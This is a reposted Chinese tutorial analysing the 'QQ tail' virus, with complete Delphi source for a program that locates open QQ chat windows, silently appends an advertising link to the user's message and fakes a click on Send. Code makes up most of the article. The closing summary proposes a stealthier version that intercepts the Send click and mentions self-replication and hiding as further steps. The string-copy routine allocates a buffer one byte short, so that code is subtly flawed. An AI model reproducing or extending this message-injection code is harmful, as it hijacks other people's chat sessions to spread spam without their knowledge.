明輝手游網(wǎng)中心:是一個免費提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺!

QQ尾巴病毒的發(fā)送原理區(qū)分

發(fā)表時間:2024-06-11 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:

[摘要]近來QQ尾巴病毒大肆發(fā)作,我也是經(jīng)常收到網(wǎng)友們發(fā)到來的帶尾巴的消息,于是,好奇心一來,我也來研究研究此病毒的發(fā)作原理。首先,我不知道QQ尾巴病毒真正的原理,我只是猜測并且自己寫了一個類似的程序來實現(xiàn)它。 QQ尾巴的發(fā)作情況:當(dāng)用戶打開一個QQ消息發(fā)送窗口時,病毒會自動往消息文本框里輸入文本,然后不...
近來QQ尾巴病毒大肆發(fā)作,我也是經(jīng)常收到網(wǎng)友們發(fā)到來的帶尾巴的消息,于是,好奇心一來,我也來研究研究此病毒的發(fā)作原理。首先,我不知道QQ尾巴病毒真正的原理,我只是猜測并且自己寫了一個類似的程序來實現(xiàn)它。



QQ尾巴的發(fā)作情況:當(dāng)用戶打開一個QQ消息發(fā)送窗口時,病毒會自動往消息文本框里輸入文本,然后不等用戶反應(yīng)過來就發(fā)出去了。



程序?qū)崿F(xiàn):首先要找到QQ消息發(fā)送窗口的句柄以及消息文本框與“發(fā)送”按鈕的窗口句柄。



一、             如何找到QQ消息發(fā)送窗口句柄:

QQ消息發(fā)送窗口有兩種,一種是消息模式,在這種情況下,窗口標(biāo)題含有“發(fā)送消息”字樣;一種是聊天模式,窗口標(biāo)題含有“聊天中”字樣;

通過枚舉窗口就可找到相應(yīng)的句柄:

// 取得QQ的發(fā)送消息窗口

function GetQQWnd: HWND;

var

  hCurrentWindow: HWnd;

  WndText:String;

begin

  hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);

  while hCurrentWindow <> 0 do

  begin

    WndText:=GetWndText(hCurrentWindow);

    if (Pos('聊天中',WndText)>0) or (Pos('發(fā)送消息',WndText)>0) then

    begin

      Result:=hCurrentWindow;

      Exit;

    end;

    hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);

  end;

  Result:=0;

end;



二、             如何找到“發(fā)送”按鈕窗口句柄:

找到了QQ的發(fā)送消息窗口后,就可以進(jìn)一步查找“發(fā)送”按鈕句柄了,如窗口句柄為qqWnd,則可以用一個循環(huán),查找文本中含有“發(fā)送”字樣的窗口,經(jīng)過試驗發(fā)現(xiàn),“發(fā)送”按鈕恰恰是窗體的第一個子窗口,這樣,可以用

btnWnd:=GetDlgItem(qqWnd,1);  // 發(fā)送按鈕

來獲得“發(fā)送”按鈕的句柄。



三、             如何找到消息文本框窗口句柄:

消息文本框并不好找,不過你可以先在消息文本框中輸入幾個字母,如“abcd”,這樣我們就可以用上述方法來查找了,不過通過實驗后,發(fā)現(xiàn)消息文本框并不是QQ窗口的直接子窗口,而是其中一個子窗口的子窗口,通過實驗,可以用

txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD);  // 文本框

來獲得。



四、             如何獲得原消息文本框的文本:

要獲取原消息文本框的文本,只需要一個API函數(shù)就行了,如下:

// 獲得窗口文本

function GetWndText(hWnd: HWND): String;

Var

  Ret:LongInt;

  mText:PChar;

  Buf:Integer;

begin

  Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;

  GetMem(mText,Ret);

  try

    Buf:=LongInt(mText);

    SendMessage(hWnd,WM_GETTEXT,Ret,Buf);

    Result:=StrPas(mText);

  finally

    FreeMem(mText,Ret);

  end;

end;



五、             如何住原消息文本框里追加文本:

與取文本相反

// 發(fā)送文本到窗口

procedure SetWndText(hWnd: HWND; Text: String);

Var

  Ret:LongInt;

  mText:PChar;

  Buf:Integer;

begin

  GetMem(mText,Length(Text));

  StrCopy(mText,PChar(Text));

  try

    Buf:=LongInt(mText);

    SendMessage(hWnd,WM_SETTEXT,0,Buf);

  finally

    FreeMem(mText,Length(Text));

  end;

end;

六、             如果讓“發(fā)送”按鈕自動點擊:

一切都準(zhǔn)備好了,現(xiàn)在要開始發(fā)送了,為了讓消息自動發(fā)送,我們可以模擬“發(fā)送”按鈕被點擊了。

  SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);

  SendMessage(btnWnd,WM_LBUTTONUP,0,0);

通過模擬一個鼠標(biāo)在“開始”按鈕上的按下與放開,就實現(xiàn)了點擊發(fā)送功能。



七、             其它的定時功能比較簡單,在此也不多說了。



八、             全部源代碼如下:

unit Unit1;



interface



uses

  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

  Dialogs, StdCtrls, ExtCtrls;



type

  TForm1 = class(TForm)

    Timer1: TTimer;

    Button1: TButton;

    Edit1: TEdit;

    Label1: TLabel;

    Button2: TButton;

    procedure Timer1Timer(Sender: TObject);

    procedure Button1Click(Sender: TObject);

    procedure Button2Click(Sender: TObject);

  private

    { Private declarations }

  public

    { Public declarations }

  end;



var

  Form1: TForm1;



implementation



{$R *.dfm}



// 獲得窗口文本

function GetWndText(hWnd: HWND): String;

Var

  Ret:LongInt;

  mText:PChar;

  Buf:Integer;

begin

  Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;

  GetMem(mText,Ret);

  try

    Buf:=LongInt(mText);

    SendMessage(hWnd,WM_GETTEXT,Ret,Buf);

    Result:=StrPas(mText);

  finally

    FreeMem(mText,Ret);

  end;

end;

// 發(fā)送文本到窗口

procedure SetWndText(hWnd: HWND; Text: String);

Var

  Ret:LongInt;

  mText:PChar;

  Buf:Integer;

begin

  GetMem(mText,Length(Text));

  StrCopy(mText,PChar(Text));

  try

    Buf:=LongInt(mText);

    SendMessage(hWnd,WM_SETTEXT,0,Buf);

  finally

    FreeMem(mText,Length(Text));

  end;

end;

// 取得QQ的發(fā)送消息窗口

function GetQQWnd: HWND;

var

  hCurrentWindow: HWnd;

  WndText:String;

begin

  hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);

  while hCurrentWindow <> 0 do

  begin

    WndText:=GetWndText(hCurrentWindow);

    if (Pos('聊天中',WndText)>0) or (Pos('發(fā)送消息',WndText)>0) then

    begin

      Result:=hCurrentWindow;

      Exit;

    end;

    hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);

  end;

  Result:=0;

end;

// 定時處理

procedure TimerProc;

var

  qqWnd,txtWnd,btnWnd:HWND;

  Msg:String;

begin

  qqWnd:=GetQQWnd;

  if qqWnd=0 then Exit;



  btnWnd:=GetDlgItem(qqWnd,1);  // 發(fā)送按鈕

  txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD);  // 文本框

  if (btnWnd=0) or (txtWnd=0) then Exit;

  Msg:=GetWndText(txtWnd);

  Msg:=Msg+#13+#10+'歡迎光臨綠蔭網(wǎng)絡(luò)http://www.lvyin.net';

  SetWndText(txtWnd,Msg);

  SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);

  SendMessage(btnWnd,WM_LBUTTONUP,0,0);

end;



procedure TForm1.Timer1Timer(Sender: TObject);

begin

  TimerProc;

end;



procedure TForm1.Button1Click(Sender: TObject);

begin

  Timer1.Enabled :=not Timer1.Enabled;

  if Timer1.Enabled then

    Button1.Caption :='停 止'

  else

    Button1.Caption :='開 始';

end;



procedure TForm1.Button2Click(Sender: TObject);

begin

  Timer1.Interval :=StrToInt(Edit1.Text);

end;



end.



       總結(jié):上面只講述了QQ消息自動發(fā)送的主要功能,這或許跟QQ尾巴的原理不同(我也不知道),但總體上應(yīng)該差不多。如果要做到讓用戶感覺不到異常,就要改一下了,不要自動發(fā)送,而是在當(dāng)用戶點擊了“發(fā)送”按鈕后再把文本加進(jìn)去。這樣的話可是攔截“發(fā)送”按鈕的點擊消息,然后再用上述方法把文本加進(jìn)去,然后把消息交還原程序處理。至于如何讓它成為病毒,會自我復(fù)制,自我隱藏等功能,那又是另外一個話題了,在此就不多講了。



       另:此文只作技術(shù)研討之用,希望大家不要拿它來搗蛋,如有產(chǎn)生后果,本人概不負(fù)責(zé)。歡迎大家來信探討。



       作者:吳創(chuàng)豪

       Email:wuqiu@regalcyber.com

       HomePage:http://www.chuanghao.com